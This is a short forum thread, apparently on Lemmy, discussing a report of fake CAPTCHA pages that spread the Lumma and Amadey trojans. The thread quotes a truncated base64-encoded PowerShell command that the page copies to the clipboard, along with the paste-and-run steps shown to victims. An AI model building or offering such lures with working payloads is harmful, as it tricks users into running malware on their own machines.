Wait, is that the actual like it copies? Does powershell just straight up parse base64?
Comment on Malicious CAPTCHA delivers Lumma and Amadey Trojans.
Telorand@reddthat.com 2 weeks ago
The Trojans are distributed through CAPTCHAs with instructions. Clicking the “I’m not a robot” button [for example] copies the line
powershell.exe -eC bQBzAGgAdABhA<…>MAIgA=
to the clipboard and displays so-called “verification steps”:
- Press Win + R (this opens the Run dialog box);
- Press CTRL + V (this pastes the line from the clipboard into the text field);
- Press Enter (this executes the code).
Malicious use of the system clipboard seems to be the popular choice, these days. If you fall for this, maybe the internet isn’t the place for you, just yet.
Ganbat@lemmy.dbzer0.com 2 weeks ago
ug01x@lemmy.world 2 weeks ago
This really is the computer virus equivalent of those scammer calls where the only way for someone to avoid jail time, or something else bad, is for you to go and buy hundreds of dollars worth of gift cards and send the codes.
Telorand@reddthat.com 2 weeks ago
My BiL actually fell for one of those. He’s profoundly naive, and it’s probably good that he’s in the military, since they make many of life’s choices for him.